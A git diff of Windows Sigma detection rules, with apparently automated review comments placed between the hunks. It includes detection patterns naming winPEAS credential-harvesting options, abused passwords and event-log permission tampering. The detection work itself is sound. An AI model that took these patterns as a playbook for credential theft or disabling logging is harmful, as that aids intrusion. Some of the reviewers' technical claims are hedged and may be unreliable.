+ selection_w32tm:
+ - Image|endswith: '\w32tm.exe'
+ - OriginalFileName: 'w32time.dll'
+ selection_cmd:
+ CommandLine|contains|all:
+ - '/stripchart'
+ - '/computer:'
+ - '/period:'
+ - '/dataonly'
+ - '/samples:'
+ condition: all of selection_*
+falsepositives:
+ - Legitimate use
+level: high # because unlikely legitimate use of that flag combination
+tags:
+ - attack.discovery
+ - attack.t1124
diff --git a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml
new file mode 100644
index 000000000..0afe7b43e
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml
@@ -0,0 +1,26 @@
+title: Weak or Abused Passwords In CLI
+id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4
+status: experimental
+description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline
+references:
+ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
+author: Nasreddine Bencherchali
+date: 2022/09/14
+tags:
+ - attack.defense_evasion
+ - attack.execution
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ CommandLine|contains:
+ # Add more passwords
+ - 'Asd123.aaaa'
+ - 'password123'
+ - '123456789'
+ condition: selection
+falsepositives:
+ - Legitimate usage of the passwords by users via commandline (should be discouraged)
+ - Other currently unknown false positives
+level: medium
diff --git a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml
index 38dea0b0b..92a7a55f9 100644
--- a/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml
+++ b/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml
@@ -47,6 +47,10 @@ detection:
CommandLine|contains|all:
- '\AppData\Local\Packages\Microsoft.WindowsTerminal_'
- '\LocalState\settings.json'
+ filter_vsdevcmd:
+ CommandLine|contains|all:
+ - 'C:\Program Files\Microsoft Visual Studio\'
+ - '\Common7\Tools\VsDevCmd.bat'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Other legitimate "Windows Terminal" profiles
diff --git a/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml
new file mode 100644
index 000000000..917e8fdba
--- /dev/null
+++ b/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml
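Review bot: `'123456789'` is a bare digit run, and under `CommandLine|contains` it matches any command line carrying that sequence — counters, serial numbers, test data — whereas the other two entries are specific strings; this will dominate the rule's alert volume. Either pair the list with a second selection that establishes a credential context (for instance `CommandLine|contains` on `net user`, `/add` or `password`) and AND the two, or drop the numeric entry; at minimum the `# Add more passwords` comment should read `# Keep entries specific enough not to match ordinary numeric or word arguments`. The tags `attack.defense_evasion` / `attack.execution` do not describe weak-credential use; a credential- or account-related technique (the description's own `net` example points at account creation) fits better.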
@@ -0,0 +1,40 @@
+title: Detect Execution of winPEAS
+id: 98b53e78-ebaf-46f8-be06-421aafd176d9
+status: experimental
+description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
+author: Georg Lauenstein
+date: 2022/09/19
+references:
+ - https://github.com/carlospolop/PEASS-ng
+ - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
+tags:
+ - attack.privilege_escalation
+ - attack.t1082
+ - attack.t1087
+ - attack.t1046
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection_basic:
+ Image|endswith:
+ - '\winPEASany.exe'
+ - '\winPEASany_ofs.exe'
+ - '\winPEASx64.exe'
+ - '\winPEASx64_ofs.exe'
+ - '\winPEASx86.exe'
+ - '\winPEASx86_ofs.exe'
+ selection_pe:
+ OriginalFileName: 'winPEAS.exe'
+ selection_option:
+ - CommandLine|endswith:
+ - 'serviceinfo' # Search services information
+ - 'applicationsinfo' # Search installed applications information
+ - 'windowscreds' # Search windows credentials
+ - 'browserinfo ' # Search browser information
+ - 'fileanalysis' # Search specific files that can contains credentials and for regexes inside files
+ - CommandLine|contains: '.exe browserinfo ' # Search browser information
+ condition: 1 of selection*
+falsepositives:
+ - Other programs that use the same command line flags
+level: high
diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
index c6c92af1f..3e97012a9 100644
--- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
+++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
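Review bot: `'browserinfo '` carries a trailing space inside `CommandLine|endswith`, so it can only match a command line that literally ends in a space, which process-creation logs do not normally preserve; drop the space (`- 'browserinfo' # Search browser information`) so it behaves like the other four entries, and the separate `CommandLine|contains: '.exe browserinfo '` entry still covers the mid-line case. Because the condition is `1 of selection*`, `selection_option` also fires on its own, so any process whose command line merely ends with `serviceinfo` or `fileanalysis` is raised at level high without any image or PE evidence — the falsepositives entry hints at this, but a comment on `selection_option` should state that the generic words are intended to stand alone, or the branch should be ANDed with `selection_basic`/`selection_pe`.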
@@ -4,36 +4,50 @@ status: test
description: A General detection to trigger for processes removing .*\shell\open\command registry keys. Registry keys that might have been used for COM hijacking activities.
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
references:
- - https://github.com/OTRF/detection-hackathon-apt29/issues/7
- - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html
- - https://docs.microsoft.com/en-us/windows/win32/shell/launch
- - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand
- - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code
+ - https://github.com/OTRF/detection-hackathon-apt29/issues/7
+ - https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html
+ - https://docs.microsoft.com/en-us/windows/win32/shell/launch
+ - https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand
+ - https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code
date: 2020/05/02
-modified: 2022/03/26
+modified: 2022/09/21
logsource:
- product: windows
- category: registry_delete
+ product: windows
+ category: registry_delete
detection:
- selection:
- EventType: 'DeleteKey'
- TargetObject|endswith: '\shell\open\command'
- filter_svchost:
- Image: 'C:\Windows\system32\svchost.exe'
- filter_office:
- Image|startswith:
- 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\'
- 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\'
- Image|endswith: '\OfficeClickToRun.exe'
- filter_integrator:
- Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe'
- filter_dropbox:
- Image|endswith: '\Dropbox.exe'
- TargetObject|startswith: 'HKCR\Dropbox.'
- condition: selection and not 1 of filter_*
+ selection:
+ EventType: 'DeleteKey'
+ TargetObject|endswith: '\shell\open\command'
+ filter_svchost:
+ Image: 'C:\Windows\system32\svchost.exe'
+ filter_office:
+ Image|startswith:
+ - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\'
+ - 'C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\'
+ Image|endswith: '\OfficeClickToRun.exe'
+ filter_integrator:
+ Image: 'C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe'
+ filter_dropbox:
+ Image|endswith: '\Dropbox.exe'
+ # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
+ TargetObject|contains: '\Dropbox.'
+ filter_wireshark:
+ Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe'
+ # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
+ TargetObject|contains: '\wireshark-capture-file\'
+ filter_opera:
+ Image|startswith:
+ - 'C:\Program Files\Opera\'
+ - 'C:\Program Files (x86)\Opera\'
+ Image|endswith: '\installer.exe'
+ filter_peazip:
+ Image|contains: 'peazip'
+ # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
+ TargetObject|contains: '\PeaZip.'
+ condition: selection and not 1 of filter_*
falsepositives:
- - Unknown
+ - Unknown
level: medium
tags:
- - attack.defense_evasion
- - attack.t1112
+ - attack.defense_evasion
+ - attack.t1112
diff --git a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml
index a998c6b34..1fc7bde2f 100644
--- a/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml
+++ b/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml
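Review bot: `filter_peazip` excludes on `Image|contains: 'peazip'`, i.e. any image anywhere on disk whose path merely contains that substring, which is a far looser anchor than the neighbouring `filter_opera` (`Image|startswith` on the install directories plus `Image|endswith: '\installer.exe'`) or the svchost/integrator filters that pin a full path. Tightening it to the product's real location and binary — `Image|startswith: 'C:\Program Files\PeaZip\'` together with `Image|endswith: '\<UNINSTALLER_NAME>.exe'`, filled in from the observed event — keeps the exclusion to the installed product while the `TargetObject|contains: '\PeaZip.'` key still narrows it. `filter_wireshark` excludes an image under `\AppData\Local\Temp\`, a user-writable location; the paired `TargetObject|contains: '\wireshark-capture-file\'` keeps it narrow, but a comment recording that trade-off (`# Uninstaller runs from the user's Temp; key constraint keeps the exclusion narrow`) would help the next maintainer.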
@@ -17,7 +17,7 @@ detection:
TargetObject|endswith: '\StubPath'
filter_chrome:
Details|startswith: '"C:\Program Files\Google\Chrome\Application\'
- Details|endswith: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level'
+ Details|contains: '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called "--channel=stable" at the end
filter_edge:
Details|startswith:
- '"C:\Program Files (x86)\Microsoft\Edge\Application\'
diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml
index fc1844066..f3cb1b87c 100644
--- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml
+++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml
@@ -1,13 +1,13 @@
title: Atbroker Registry Change
id: 9577edbb-851f-4243-8c91-1d5b50c1a39b
-description: Detects creation/modification of Assisitive Technology applications and persistence with usage of ATs
+description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
status: experimental
author: Mateusz Wydra, oscd.community
references:
- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
- https://lolbas-project.github.io/lolbas/Binaries/Atbroker/
date: 2020/10/13
-modified: 2021/05/24
+modified: 2022/09/21
tags:
- attack.defense_evasion
- attack.t1218
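Review bot: The new wording `persistence with usage of 'at'` (and `legitimate at usage` in the falsepositives change in the next hunk) reads as if this rule concerned the `at` scheduler command, but the keys it watches are `Accessibility\ATs` and `Accessibility\Configuration`, where AT stands for Assistive Technology — the old `ATs` was the correct term and only `Assisitive` needed the typo fix. Suggest `description: Detects creation/modification of Assistive Technology applications and persistence through registered Assistive Technology (AT) entries` and `- Creation of non-default, legitimate Assistive Technology entries` for the falsepositives line.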
@@ -21,7 +21,11 @@ detection:
TargetObject|contains:
- 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs'
- 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration'
- condition: selection
+ filter:
+ Image: 'C:\Windows\system32\atbroker.exe'
+ TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration'
+ Details: '(Empty)'
+ condition: selection and not filter
falsepositives:
- - Creation of non-default, legitimate AT.
-level: high
+ - Creation of non-default, legitimate at usage
+level: medium
diff --git a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml
index cb1c122ea..5b66ed84b 100644
--- a/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml
+++ b/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml
@@ -5,7 +5,7 @@ description: |
A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
author: frack113
date: 2021/12/30
-modified: 2022/03/26
+modified: 2022/09/18
status: experimental
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md
@@ -24,6 +24,13 @@ detection:
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
+ filter_leg1:
+ TargetObject|contains: 'Control\Print\Monitors\MONVNC\Driver'
+ filter_leg2:
+ TargetObject|contains|all:
+ - 'Control\Print\Environments\'
+ - '\Drivers\'
+ - '\VNC Printer'
condition: selection and not 1 of filter_*
falsepositives:
- Unknown
diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml
index 8a935e286..608a3071b 100644
--- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml
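Review bot: `filter_leg1` excludes every write to `Control\Print\Monitors\MONVNC\Driver` regardless of which process or value performed it, whereas the matching exclusion this same commit adds to the CurrentControlSet ASEP rule (`filter_realvnc`) pins `Image: 'C:\Windows\System32\spoolsv.exe'` and `Details: 'VNCpm.dll'`; the port-monitor `Driver` value is the very thing this rule guards, so the looser form reopens exactly that path for any writer. Align it with the other filter by adding the same `Image` and `Details` constraints, give `filter_leg2` the `Image` constraint as well, and label both with a comment such as `# RealVNC printer driver registration performed by the spooler`. The `selection` this filter applies to begins outside the hunk.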
+++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml
@@ -11,7 +11,7 @@ references:
- https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
date: 2019/10/25
-modified: 2022/08/09
+modified: 2022/09/20
logsource:
category: registry_set
product: windows
@@ -45,6 +45,13 @@ detection:
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
+ filter_poqexec:
+ Image: 'C:\Windows\System32\poqexec.exe'
+ TargetObject|endswith: '\NetworkProvider\Order\ProviderOrder'
+ filter_realvnc:
+ Image: 'C:\Windows\System32\spoolsv.exe'
+ TargetObject|endswith: '\Print\Monitors\MONVNC\Driver'
+ Details: 'VNCpm.dll'
condition: all of system_control_* and not 1 of filter_*
fields:
- SecurityID
diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
index ad5a53caa..500836df0 100644
--- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
+++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml
@@ -12,7 +12,7 @@ references:
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
- https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
date: 2019/10/25
-modified: 2022/09/06
+modified: 2022/09/21
logsource:
category: registry_set
product: windows
@@ -103,8 +103,10 @@ detection:
- 'C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\'
Details|contains: '\AppData\Local\Microsoft\OneDrive\'
filter_python:
- TargetObject|endswith: '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{c60fd5ac-367d-4e3a-a975-f157502ac30a}'
- Details|contains: '\AppData\Local\Package Cache\{c60fd5ac-367d-4e3a-a975-f157502ac30a}\python'
+ TargetObject|contains: '\Microsoft\Windows\CurrentVersion\RunOnce\{'
+ Details|contains|all:
+ - '\AppData\Local\Package Cache\{'
+ - '}\python-'
Details|endswith: '.exe" /burn.runonce'
filter_officeclicktorun:
Image|startswith:
@@ -125,6 +127,12 @@ detection:
- '"C:\Program Files\AVG\Antivirus\AvLaunch.exe" /gui'
- '"C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe" /gui'
- '{472083B0-C522-11CF-8763-00608CC02F24}'
+ filter_aurora_dashbaord:
+ Image|endswith:
+ - '\aurora-agent-64.exe'
+ - '\aurora-agent.exe'
+ TargetObject|endswith: '\Microsoft\Windows\CurrentVersion\Run\aurora-dashboard'
+ Details: 'C:\Program Files\Aurora-Agent\tools\aurora-dashboard.exe'
condition: all of current_version_* and not 1 of filter_*
fields:
- SecurityID
diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml
index 0fe1f398d..31626072c 100644
--- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml
+++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml
@@ -12,7 +12,7 @@ references:
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
- https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
date: 2019/10/25
-modified: 2022/08/05
+modified: 2022/09/21
logsource:
category: registry_set
product: windows
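Review bot: `filter_aurora_dashbaord` misspells "dashboard"; the name is only ever reached through `1 of filter_*`, so matching is unaffected, but it will be copied into downstream tooling and grep results, so rename it `filter_aurora_dashboard` now while nothing refers to it. In the preceding hunk, the generalised `filter_python` (any `RunOnce\{` GUID whose `Details` carries `Package Cache\{…}\python-` and ends in `/burn.runonce`) drops the previous exact GUID without saying what it now covers; a one-line comment such as `# Python installer bundle re-launching itself via RunOnce (burn.runonce)` saves the next reader the lookup. The remainder of the `current_version_*` selections and the `condition` line are outside the first hunk.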
@@ -72,6 +72,9 @@ detection:
Image|endswith: '\OfficeClickToRun.exe'
filter_ms_win_desktop_runtime:
Details|startswith: '"C:\ProgramData\Package Cache\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\windowsdesktop-runtime-'
+ filter_vcredist:
+ Image|endswith: '\VC_redist.x64.exe'
+ Details|endswith: '}\VC_redist.x64.exe" /burn.runonce'
condition: all of wow_current_version_* and not 1 of filter_*
fields:
- SecurityID
diff --git a/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml b/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml
new file mode 100644
index 000000000..234213d68
--- /dev/null
+++ b/rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml
@@ -0,0 +1,30 @@
+title: Change Winevt Event Access Permission Via Registry
+id: 7d9263bd-dc47-4a58-bc92-5474abab390c
+description: Detects tampering with the "ChannelAccess" registry key in order to change access to windows event channel
+author: frack113
+date: 2022/09/17
+status: experimental
+references:
+ - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/
+ - https://learn.microsoft.com/en-us/windows/win32/api/winevt/
+ - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/
+logsource:
+ category: registry_set
+ product: windows
+detection:
+ selection:
+ EventType: SetValue
+ TargetObject|startswith: 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\'
+ TargetObject|endswith: '\ChannelAccess'
+ # Add more interesting combinations if you found them
+ Details|contains:
+ - '(A;;0x1;;;SY)' # Local System having GENERIC ALL
+ - '(A;;0x5;;;BA)' # Built-in administrators having GENERIC ALL and GENERIC WRITE
+ - '(A;;0x1;;;LA)' # Local administrator having GENERIC ALL
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
+tags:
+ - attack.defense_evasion
+ - attack.t1562.002
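Review bot: The ACE comments on the three `Details|contains` values look wrong: in a channel's `ChannelAccess` SDDL the access mask holds the event-log-specific rights (as I recall, 0x1 = read, 0x2 = write, 0x4 = clear, with SYSTEM normally granted 0xf0007), so `(A;;0x1;;;SY)` cuts SYSTEM down to read-only — a reduction from the default, which is what makes it suspicious — rather than `GENERIC ALL`, and `0x5` is read plus clear, not `GENERIC ALL and GENERIC WRITE`; generic-all would appear as `GA` or 0x10000000. Suggest `# SYSTEM reduced to read-only (0x1); default grants 0xf0007` and analogous corrections for the BA and LA entries, checked against the winevt documentation already in references. Separately, `TargetObject|startswith: 'HKLM\SOFTWARE\…'` anchors on the hive prefix, while the registry rules touched elsewhere in this commit deliberately avoid a hive anchor because it can be logged in another variation; `TargetObject|contains: '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\'` would be consistent with them.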
diff --git a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml
index 5caf99e9d..72d5abdd5 100644
--- a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml
+++ b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml
@@ -7,6 +7,7 @@ references:
- https://twitter.com/MichalKoczwara/status/1553634816016498688
- https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/
date: 2022/08/01
+modified: 2022/09/18
logsource:
category: registry_set
product: windows
@@ -22,7 +23,9 @@ detection:
- '\Enabled'
- '\Start'
Details: DWORD (0x00000000)
- condition: all of selection*
+ filter_legitimate:
+ Image: 'C:\Windows\system32\wevtutil.exe'
+ condition: all of selection* and not 1 of filter*
falsepositives:
- Unknown
level: high
diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
index 04c010857..08ad446bf 100644
--- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
+++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml
@@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3
description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel
author: frack113, Nasreddine Bencherchali
date: 2022/07/04
-modified: 2022/09/08
+modified: 2022/09/20
status: experimental
references:
- https://twitter.com/WhichbufferArda/status/1543900539280293889
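Review bot: `filter_legitimate` excludes every `Enabled`/`Start` = 0 write made by wevtutil.exe, not just whatever benign configuration produced the false positive, so an interactive wevtutil invocation that disables a session is silenced along with the routine ones — a broad carve-out for a level-high rule whose stated purpose is catching exactly this tampering. If the FP came from a specific session key, pin it with a `TargetObject|contains` next to the `Image` match, and add a comment recording the observed event (`# FP: <SESSION_NAME> toggled by wevtutil during <ACTIVITY> — revisit`) so the exclusion can be revisited rather than inherited. The `selection*` blocks this condition combines are outside the hunk.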
@@ -27,7 +27,9 @@ detection: TargetObject|contains: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' - filter_empty: + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\' + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Runtime\Error\' + filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' - null diff --git a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml index 49a746ff1..b356a4de5 100644 --- a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml +++ b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml @@ -6,6 +6,7 @@ related: description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it author: Nasreddine Bencherchali date: 2022/08/23 +modified: 2022/09/18 status: experimental references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade @@ -25,7 +26,9 @@ detection: - '\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider' - '\System\CurrentControlSet\Services\RDPNP\NetworkProvider' #- '\System\CurrentControlSet\Services\P9NP\NetworkProvider' # Related to WSL remove the comment if you use WSL in your ENV - condition: selection and not filter + filter_valid_procs: + Image: C:\Windows\System32\poqexec.exe + condition: selection and not 1 of filter* falsepositives: - Other legitimate network providers used and not filtred in this rule level: high 
diff --git a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml index 96d0c1676..b68f4b1eb 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml @@ -6,6 +6,7 @@ references: - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea) author: Nasreddine Bencherchali date: 2022/07/28 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Microsoft\Windows\Start Menu\Programs\Startup\' - '\System32\spool\drivers\color\' # as seen in the knotweed blog - '%temp%' + - '%tmp%' - '%appdata%' condition: selection falsepositives: diff --git a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml index 753f0d395..dce4cc2a3 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml @@ -7,7 +7,7 @@ references: - https://attack.mitre.org/techniques/T1546/015/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2022/09/02 +modified: 2022/09/20 logsource: category: registry_set product: windows 
@@ -79,6 +79,11 @@ detection: filter_sec_health_svc: Image: 'C:\Windows\system32\SecurityHealthService.exe' Details|contains: 'C:\Windows\System32\SecurityHealth' + filter_inprocserver: + Image: + - 'C:\Windows\System32\poqexec.exe' + - 'C:\Windows\System32\regsvr32.exe' + TargetObject|endswith: '\InProcServer32\(Default)' condition: selection and not 1 of filter* falsepositives: - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level diff --git a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml index 474ba773b..5ce063496 100644 --- a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml +++ b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml @@ -3,7 +3,7 @@ id: 612e47e9-8a59-43a6-b404-f48683f45bd6 description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. author: frack113 date: 2022/02/04 -modified: 2022/08/10 +modified: 2022/09/20 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time @@ -22,6 +22,8 @@ detection: Image: 'C:\Windows\system32\lsass.exe' TargetObject|endswith: '\CurrentControlSet\Services\NTDS\Parameters\ServiceDll' Details: '%%systemroot%%\system32\ntdsa.dll' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' condition: selection and not 1 of filter* falsepositives: - Administrative scripts diff --git a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml index 85eb02878..3af8eef6b 100644 --- a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml 
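Review bot: `filter_inprocserver` exempts every `\InProcServer32\(Default)` write made by `regsvr32.exe` with no constraint on `Details` (the DLL path being registered), so in a rule that, judging by its file name, targets COM/search-order persistence, any DLL registration routed through regsvr32 is no longer visible; `poqexec.exe` is a servicing process and a more defensible blanket exclusion, regsvr32 is not. Suggest splitting the filter and constraining the regsvr32 branch on the value written, e.g. `Details|startswith:` with `'C:\Windows\'` and `'C:\Program Files'`, or at least a comment naming the benign registration that motivated it. `filter_poqexec` in the ServiceDLL hunk on the same line is the same Image-only pattern but for the servicing binary alone, which is acceptable.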
@@ -3,6 +3,7 @@ id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 description: Detects when an attacker register a new SIP provider for persistence and defense evasion author: Nasreddine Bencherchali date: 2022/07/21 +modified: 2022/09/21 status: experimental references: - https://persistence-info.github.io/Data/codesigning.html @@ -28,7 +29,11 @@ detection: # Add more legitimate SIP providers according to your env - WINTRUST.DLL - mso.dll - condition: all of selection_* and not filter + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|contains: '\CryptSIPDll' + Details: 'C:\Windows\System32\PsfSip.dll' + condition: all of selection_* and not 1 of filter* falsepositives: - Legitimate SIP being registered by the OS or different software. level: medium diff --git a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml index 52af03166..58cc3cf87 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml @@ -11,6 +11,7 @@ references: - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/ - https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN date: 2022/08/10 +modified: 2022/09/13 logsource: category: registry_set product: windows @@ -29,6 +30,7 @@ detection: - '\Desktop\' - '\Downloads\' - '%temp%' + - '%tmp%' - 'iex' - 'Invoke-' - 'rundll32' diff --git a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml index 0f3f90a4a..691ef5e8c 100644 --- 